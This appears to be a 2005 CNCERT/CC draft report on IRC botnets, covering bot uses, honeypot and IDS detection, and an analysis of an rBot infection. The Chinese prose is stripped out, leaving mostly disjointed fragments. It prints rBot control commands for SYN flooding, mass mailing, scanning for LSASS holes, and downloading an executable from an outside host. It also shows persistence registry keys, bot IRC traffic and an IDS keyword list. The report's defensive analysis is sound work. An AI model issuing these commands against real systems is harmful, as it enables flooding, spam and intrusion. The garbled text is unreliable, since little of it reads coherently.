CNCERT/CC CNCERT/CC CNCERTCC_TR_2005-001(Draft)
Worm DDos Spam Phishing Spyware
Botnet [1]
Bot
DDos
DDos
Bot: ±Robo Bot
Zombie: Zombie Bot Bot Zombie Bot Bot Zombie IRC Bot: IRC Bot ,IRC Bot Channel IRC Bot Bot IRC Bot Bot Command&Control Server: IRC Bot IRC & C&C S, BotNet: Bot C&C S
IRC 1
IRC Bot
1 IRC IRC
Bot Bot
IRC AOL Bot IRC Bot AOL AIM-Canbot Fizzer AOL Instant Messager Bot P2P Bot Bot phatbot P2P
Bot 90 Unix Bot 1993 Eggdrop Bot Bot IRC
Bot Bot Bot Bot Bot IRC Bot Bot Bot [email protected] MSN Bot
1999 11 SubSeven 2.1 IRC IRC Bot IRC Bot Bot IRC Bot Bot Windows Spam DDos Bot
Bot (Worm) Bot Bot 2003 Deloader Bot Bot Bot Bot Bot Trojan Horse Bot
IP Bot IRC DCC Bot Spyware
2
Bot trojan horse worm / / Spyware virus 2
1 2001
[16]
Botnet
2004 3 19 Witty Witty 10 110 20 50 2 DDoS DDoS
DDoS
DDoS DDoS DDoS 3 IP CERT MessageLab [9][10] DDoS
4
5
6 socks
IRC IRC Bot
1 IRC Internet Relay Chat IRC RFC1459 IRC Channel
IRC IRC / IRC IRC
irc.263.net IP IP IRC Server A IP1 B IP2 A B IRC Server irc.263.net IRC IRC TCP 6667 6000 7000 IRC Bot 443 8000 500
IRC
2 IRC Bot IRC Bot IRC IRC HIRC mIRC 1 IRC Bot IRC 2 IRC Bot
IRC Bot IRC GT bot IRC mIRC mIRC mIRC mIRC GT bot mIRC IRC Bot IRC IRC Bot IRC 1 NICK USER Bot IRC 2 PASS: IRC PASS TCP 3 JOIN #Channel key key
3) MODE: IRC Bot 4) PING PONG IRC IRC PING PONG PING IRC IRC Bot
PING/PONG IRC Bot 5) PRIVMSG Channel msg Bot
6) DCC SEND Bot 3 (Bot) IRC
P2P
IRC DCC 1987
2004 CNCERT/CC
1 DDos
->PRIVMSG #rbot :.syn www.xxx.com 80 200 3600\n #rbot .syn syn flood 200 www.xxx.com 80 syn 3600 -> bot C&C S <- 2 (Phishing) DNS host pharming ISP redirector
[6]
Phi s h i ng
3 (Spam)
Spammer blacklist 1
->PRIVMSG #rbot : .mm http://www. recpt.com/fetch.php http://www.mail.net/email.html
.mm mass mail, http://www. recpt.com/ fetch.php php http://www.mail.net/email.html
ip spammer 2 socks v4/v5 Open Relay Spammer Open Proxy Open Mail Relay Open Relay Server Open Mail Relay Spammer Spammer Proxy Open Relay Proxy Open Relay Spammer Proxy Open Relay
Spammer
socks v4 Smtp Open Relay socks v4 Open Relay IP ISP IP
3 email AgoBot harvest.emails 4 (Spyware)
Spyware Keylogger :
->PRIVMSG #rBot : Download http://www.elitecoders.net/update.exe c:\rBot.exe 1
http://www.elitecoders.net update.exe c:\rBot.exe 1
Windows Bot Bot bot PING/PONG bot IRC TCP 6667 CNCERT/CC bot bot
cmd.exe ±netst at an IP IP 135 445 fport.exe netstat
11 bot CD-Key , bot
bot ie ie bot rootkit [2] bot rootkit rootkit bot
CNCERT/CC
1 honeypot bot 2) IDS 3 IRC 1 Honeypot bot bot Honeywall bot dns/ip / / windows 25 [11] bot bot [3] honeynet project 2004 11 2005 3 1 HoneyWall 1 mwcollect[8] , 180 30 5500 800 2004 11 2005 1 406 Ddos 179 [4] 2
IRC IDS IRC Bot JOIN PASS PRIVMSG NICK TOPIC NOTICE IRC TCP udp syn ddos http:// download .exe update scan exploit login logon advscan lsass dcom beagle dameware 3 1 bot(fast joining bots) bots IRC IRC
2) bot(Long standing connection) bots
3) bot(not talkative) Bots bot ping/pong
DdoSVax [5] Bot 4 1 IDS bot bot bot bot bot, IDS IRC
2 IDS IRC Bot IRC IRC RFC IDS
bot
IRC IRC
3 IDS bot IDS socks v4 Server ±TOPI #rBot :.advscan lsass 200 5 0 -r s a ->TOPIC #rBot :.advscan lsass 200 5 0 -r s\n b ->TOPIC #rBot :.advscan lsass 200 5 0 -r s\n c) Botnet bot <-:ControllerNICK!ControllerUSER@socks(HOST or IP) TOPIC #rBot :.advscan lsass 200 5 0 -r s\r\n IDS bot IP IP IP IP IDS 3 1 3 1 3 1 1 IDS
IRC 1 IP port ( ) 2. channel ( ) 3. Host .login pass
host bot 4 Bot login .update .download .uninstall
Botnet
1.
bot 1 bot
bot bot 2 bot bot bot bot
2.
IP
bot
3. bot
2005 CNCERT/CC
Bot
1 IRC IRC bot bot bot IRC Serv1 Serv2 Ser v N IRC Serv1 Serv1 IP Serv2 Serv3 Serv2 Nick_Serv1 Serv2 Serv1 IRC ServX Nick_Serv3 Nick_Serv6 Serv3 Serv6 ServX
2. TOPIC TOPIC IRC bot TOPIC TOPIC 1).advscan lsass 200 5 0 -r s LSASS 200 5 -r = random -s = silent 2).http.update http:/server/rBot.exe c:\rBot.exe 1 server rBot.exe c: 1 CNCERT/CC TOPIC Bot TOPIC °J OI N #ne wchanne TOPIC PRIVMSG bot bot bot TOPIC
TOPIC IP IP IP 3 bot bot Bot .login !logon !auth bot bot nick
host rBot v0.6.5
1 ; ->PRIVMSG #rbot .login password s\n IP 2 bot;
<-:ControllerNICK!ControllerUSER@host PRIVMSG #rbot :.login password -s\r\n
1 2 IP , Bot host IP
<-:[email protected] PRIVMSG #rbot :.login password -s\r\n
10.10.10.10 .login 3 rBot NICK ControllerNICK USER(ControllerUSER) host (.login) (password -s) rBot user host rBot host *@*.net "*@*.com" .net .com rBot host .com .net
(*) 4 -s silent bot
->PRIVMSG #rbot password accepted\n
bot Windows Windows bot 90 [7]
Windows XP
11 Bot
Symantec 2004 1 6 Bot 2000 30000 [15] MessageLabs 2004 70% [10] CipherTrust 2005 4 5 15 17 20%-15% Bot [12]
IRC Agobot PhatBot P2P IRC P2P
2005 rootkit bot(rBot ) rootkit bot bot
2004 CNCERT/CC Bot IRC
P2P P2P bot Phatbot[13] sinit[14] Phatbot Gnutella Guutella cache servers server peer peer TCP 4387 Gnutella Phatbot waste waste Phatbot waste md5 Phatbot sinit P2P Peer dll dll sinit
bot
CNCERT/CC bot
http://goa-irc.co.uk/wosten/rbot.exe 2005 7 9 9 rbot.exe IP 10.0.0.1 sniffer cmd.exe c:\>netstat an\r\n
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 10.0.0.1:1150 203.151.217.85:6667 ESTABLISHED 203.151.217.85 6667 TCP 10.0.0.1:1616 202.108.32.137:445 FIN_WAIT_1 TCP TCP 10.0.0.1:1631 202.108.32.147:445 FIN_WAIT_1 TCP 10.0.0.1:1714 202.108.32.190:445 FIN_WAIT_1 TCP 10.0.0.1:1727 202.108.32.165:445 FIN_WAIT_1 TCP 10.0.0.1:2253 202.108.34.211:445 TIME_WAIT TCP 10.0.0.1:2904 202.108.37.91:445 TIME_WAIT TCP 10.0.0.1:3476 202.108.39.151:445 TIME_WAIT TCP 10.0.0.1:3478 202.108.39.153:445 TIME_WAIT TCP 10.0.0.1:3480 202.108.39.155:445 TIME_WAIT TCP 10.0.0.1:3486 202.108.39.151:445 TIME_WAIT IP TCP 10.0.0.1:3487 202.108.39.153:445 TIME_WAIT TCP 10.0.0.1:3488 202.108.39.155:445 TIME_WAIT TCP 10.0.0.1:3673 202.108.40.82:445 TIME_WAIT TCP 10.0.0.1:3674 202.108.40.82:445 TIME_WAIT TCP 10.0.0.1:4953 202.108.45.20:445 TIME_WAIT TCP 10.0.0.1:4955 202.108.45.20:445 TIME_WAIT TCP 10.0.0.1:4959 202.108.45.23:445 TIME_WAIT TCP 10.0.0.1:4961 202.108.45.23:445 TIME_WAIT UDP 0.0.0.0:69 *:* UDP 69 UDP 0.0.0.0:445 *:* UDP 10.0.0.1:137 *:* UDP 10.0.0.1:138 *:*
fport.exe C:\ >fport | find "1150" 1150 6667
1048 wininit -> 1150 TCP C:\WINNT\system32\wininit.exe
C:\>fport | find "69"
1048 wininit -> 69 UDP C:\WINNT\system32\wininit.exe
6667 69 wininit.exe rBot wininit.exe sysinternals FileMon bot sysinternals autoruns rBot
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Update 32 "wininit.exe"
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Microsoft Update 32 "wininit.exe"
Wininit 445 6667
Wininit IRC
->NICK CHN|9148119\r\nUSER autdeoxsnv 0 0: CHN|9148119\r\n ( )
->JOIN #xdcc dropit\r\n ( xdcc , dropit)
<-: CHN|9148119! autdeoxsnv @10.0.0.1 332 CHN|9148119 #xdcc :.advscan asn1smb 100 5 0 b (
, advscan asn1smb )
->PRIVMSG #xdcc :[SCAN]: Sequential Port Scan Started On 10.0.0.0:445 within a delay of 5 seconds for 0 min using 100 threads\r\n( , )
CNCERT/CC 2005
[1] , , ,2005.4
[2] Malicious Bots Hide Using Rootkit Code By Paul F. Roberts May 17, 2005
http://www.eweek.com/article2/0,1759,1816972,00.asp
[3] honeynet project , ± Kno w your ene my Tracking Botnet
[4] Botnet Tracking: Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C. Freiling and Thorsten Holz and Georg Wicherski http://www.honeynet.org/papers/individual/
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann www.tik.ee.ethz.ch/~ddosvax/sada/sa-2004-29.task.pdf
[6] Know your Enemy:Phishing , http://www.honeynet.org, 16th May 2005
[7] Shield: First-Line Worm Defense Helen J. Wang, Chuanxiong Daniel R. Simon, and Alf Zugenmaier Microsoft Research ACM SIGCOMM 2004 [8] http://www.mwcollect.org [9] http://www.cert.org [10] http://www.messagelab.co.uk
[11] Joe Stewart , ° E mer gi ng Threats : Fr o m Discover y t o Pr ot ecti o www.sdissa.org/downloads/emergingthreats-public.pdf
[12] http://www.ciphertrust.com/resources/statistics/zombie.php
[13] Lurhq Threat Intelligence Group, Phatbot Trojan Analysis , http://www.lurhq.com/phatbot.html [14] Lurhq Threat Intelligence Group, Sinit P2P Trojan Analysis , http://www.lurhq.com/sinit.html [15] http://www.symantec.com/press/index_2004.html
[16] Tom Vogt, Simulating and optimising worm propagation algorithms , www.securityfocus.com/guest/24046, ,2003.9 This document was created with Win2PDF available at http://www.daneprairie.com. The unregistered version of Win2PDF is for evaluation or non-commercial use only.